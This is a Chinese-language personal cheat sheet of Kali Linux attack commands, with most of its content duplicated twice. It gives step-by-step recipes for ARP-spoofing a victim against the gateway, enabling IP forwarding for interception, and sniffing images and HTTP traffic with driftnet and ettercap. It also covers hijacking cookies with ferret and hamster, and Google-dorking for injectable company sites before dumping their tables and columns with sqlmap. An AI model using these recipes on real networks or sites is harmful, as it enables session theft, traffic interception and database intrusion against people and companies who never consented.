自己总结的一些Kali Linux的一些渗透命令
/etc/init.d/ssh start 启动ssh服务
service ssh status 查看服务是否正常运行
arpspoof -i eth0(网卡名) -t 192.168.1.101(被攻击的地址) 192.168.1.1(网关地址) 监听的时候反过来
fping -asg 192.168.1.0/24-----------显示所有子网掩码为24为的局域网的所有在线ip上
使能数据转发功能:
echo "1" > /proc/sys/net/ipv4/ip_forward
禁止数据转发功能:
echo "0" > /proc/sys/net/ipv4/ip_forward
查看数据转发状态:
cat /proc/sys/net/ipv4/ip_forward
http://blog.163.com/tiamo_n/blog/static/252768088201592594058538/
driftnet -i eth0 监听图片
ettercap -Tq -i eth0 //进入HTTP监听模式
vim /etc/ettercap/etter.conf (把linux下面的那两行的注释去掉)
劫持cookie:
先打开ip转发--->设置浏览器端口(127.0.0.1:1234)--->然后使用ferret -i eth0 ,然后打开hamster进行抓取
----------------------------------------------sqlmap--------------------------------
1.谷歌找注入点:公司 inurl:asp?id=
2.sqlmap -u 网址
3.sqlmap -u 网址 --table 猜解表名
4.Sqlmap –u 网址 --columns –T “表名”
-----------------------------------------------nmap--------------------------------------------
nmap -O ip地址 显示设备信息,主机操作系统版本
nmap 192.168.1.* 扫描整个子网
fping -a -g ip开始 ip结束
service ssh status 查看服务是否正常运行
arpspoof -i eth0(网卡名) -t 192.168.1.101(被攻击的地址) 192.168.1.1(网关地址) 监听的时候反过来
fping -asg 192.168.1.0/24-----------显示所有子网掩码为24为的局域网的所有在线ip上
使能数据转发功能:
echo "1" > /proc/sys/net/ipv4/ip_forward
禁止数据转发功能:
echo "0" > /proc/sys/net/ipv4/ip_forward
查看数据转发状态:
cat /proc/sys/net/ipv4/ip_forward
http://blog.163.com/tiamo_n/blog/static/252768088201592594058538/
driftnet -i eth0 监听图片
ettercap -Tq -i eth0 //进入HTTP监听模式
vim /etc/ettercap/etter.conf (把linux下面的那两行的注释去掉)
劫持cookie:
先打开ip转发--->设置浏览器端口(127.0.0.1:1234)--->然后使用ferret -i eth0 ,然后打开hamster进行抓取
----------------------------------------------sqlmap--------------------------------
1.谷歌找注入点:公司 inurl:asp?id=
2.sqlmap -u 网址
3.sqlmap -u 网址 --table 猜解表名
4.Sqlmap –u 网址 --columns –T “表名”
-----------------------------------------------nmap--------------------------------------------
nmap -O ip地址 显示设备信息,主机操作系统版本
nmap 192.168.1.* 扫描整个子网
fping -a -g ip开始 ip结束